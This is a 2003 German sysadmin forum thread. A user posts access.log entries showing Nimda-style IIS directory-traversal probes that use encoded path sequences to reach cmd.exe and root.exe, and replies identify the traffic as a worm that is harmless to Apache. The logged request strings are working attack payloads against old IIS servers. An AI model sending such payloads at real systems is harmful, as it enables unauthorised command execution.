RootForum Community

Resources for System-Administrators
https://www.rootforum.org/forum/

Einträge in access.log

https://www.rootforum.org/forum/viewtopic.php?t=11720

Page 1 of 1

Einträge in access.log

Posted: 2003-05-28 13:22
by paul30k
Hallo alle zusammen,

habe in der access.log folgende Einträge zu stehen:

217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

Diese wiederholen sich jeden Tag zur etwa gleichen Zeit. Kann mir vielleicht jemand sagen, was das zu bedeuten hat? Ist das ein Angriff? Und denkt dieser eventuelle Angreifer er hätte einen ISII vor sich (statt Apache 1&1-Server)?
Für jeden Tip dankbar.

Gruß,
Paul

Re: Einträge in access.log

Posted: 2003-05-28 13:27
by scythe42
Das ist kein Angreifer, sonder neun Wurm, der wohl ohne Wissen des Besitzers sein Unwesen treibt. In dem Falle ist es "Nimda". Brauchst dir keine Sorgen machen, dieser Wurm kann bei dir keinen Schaden anrichten.

http://www.symantec.com/avcenter/venc/d ... .a@mm.html

Re: Einträge in access.log

Posted: 2003-05-28 13:28
by kahler
Würde sagen, dass ist Code Red 2, der versucht einen ISS anzugreifen.
Brauchst dir also keine Gedanken zu machen.

Re: Einträge in access.log

Posted: 2003-05-28 13:46
by paul30k
Oh, vielen Dank für die schnelle Antwort. Mich hat nur gewundert, daß das Teil immer wieder versucht den Server anzugreifen. Puhh.

Gruß,
Paul
All times are UTC+02:00
Page 1 of 1